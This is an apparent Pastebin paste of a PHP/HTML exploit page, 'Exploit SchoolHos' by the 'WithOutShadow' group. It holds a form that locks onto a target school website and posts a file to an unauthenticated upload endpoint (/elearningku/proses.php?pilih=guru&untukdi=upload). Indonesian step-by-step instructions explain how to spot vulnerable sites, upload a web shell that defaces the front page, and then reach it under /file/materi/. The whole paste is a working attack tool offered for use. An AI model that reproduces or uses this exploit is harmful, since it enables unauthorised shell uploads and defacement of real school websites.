alin_tamvanz

Exploit SchoolHos

Dec 25th, 2015
195
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. $target = $_POST['trgt'];
  3. ?>
  4. <html>
  5.   <head>
  6.   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  7.   <title>Exploit SchoolHos - WOS</title>
  8. <link rel="SHORTCUT ICON" href="http://pesantrencilikindonesia.com/images/logo.png">
  9.  
  10.   </head>
  11.   <body>
  12.  
  13. <center>
  14. <h1> WithOutShadow exploit SchoolHos </h1>
  15. <center>
  16.     <script type="text/javascript">
  17.     function btn()
  18.   {
  19.     alert("target udah terkunci")
  20.   }
  21.   </script>
  22.  
  23.   <fieldset>
  24.     <legend>eXploit area !</legend>
  25.   <table width="80%"><tr><td>
  26.   <form method="post">
  27.    Target : <input type="text" id="trgt" value="http://target.sch.id" name="trgt">
  28. <input type="submit" onclick="btn()" value="LOCK target !" class="btn">
  29.   </form></tr></td>
  30.   <tr><td>
  31.   <form method="POST" action="<?php echo "$target"; ?>/elearningku/proses.php?pilih=guru&untukdi=upload" enctype="multipart/form-data" name="tambahmapel" id="tambahmapel">
  32.  Shell/file: <input type="file" id="trgt" name="fupload">
  33.   <input type="submit"  class="tombol" id="btn" value="Upload !">
  34.   </form></tr></td>
  35. </table>
  36. </fieldset>
  37. <br/><br/>
  38. <div id="st">
  39. STEPS  : <br/>
  40. 1. cek web target dengan memasukan exploit /elearningku/proses.php<br/>
  41. 2. jika halaman blank putih.. maka web tersebut 90% vuln (ada celah)<br/>
  42. 3. lalu masukan web target dan lock !<br/>
  43. 4.Upload shell/script yang di sediakan,jika berhasil otomatis  tersenggol ke halaman depan target! <br/>
  44. 5. buka file kamu di http://target.com/file/materi/file-kamu.php (target.com dan file-kamu.php hanya contoh!)<br/>
  45. </div>
  46. <br><br><br>
  47. <div id="cp">
  48. CODED BY : [\]$hutdown57[\] &#169 <?php echo date("Y"); ?> </div>
  49.   </body>
  50.   </html>
  51.  
  52. <style>
  53. body{
  54. background:url("http://pesantrencilikindonesia.com/images/logo.png")no-repeat center fixed #000;
  55. color:#fff;
  56. font-family: sans-serif;
  57. }
  58. #trgt{
  59.   color:#fff;
  60.   background:#333;
  61.   text-align: center;
  62.   width: 30%;
  63.   height:28px;
  64.   border-radius:10px;
  65. }
  66. #btn,.btn{
  67.   color:#000;
  68.   background: #fff;
  69.   width:10%;
  70.   height:25px;
  71. }
  72. #btn:hover{
  73.   color:#fff;
  74.   background: #ff0000;
  75. }
  76. .btn:hover{
  77.   color:#fff;
  78.   background: #ff0000;
  79. }
  80. #st{
  81.   color:#81ff00;
  82.   text-align: left;
  83.   font-family:cursive;
  84. }
  85. #cp{
  86.   color:#ff0000;
  87.   background:#fff;
  88.   box-shadow: 0px 0px 10px #ff0000,0px 0px 20px #ff0000;
  89. }
  90. fieldset{
  91.   color:#ff0000;
  92.   border-radius:20px;
  93. }
  94. h1{
  95.   color:#ff0000;
  96.   text-shadow:0px 0px 10px #81ff00,0px 0px 30px #fff,0px 0px 50px #ff0000;
  97. }
  98. </style>
RAW Paste Data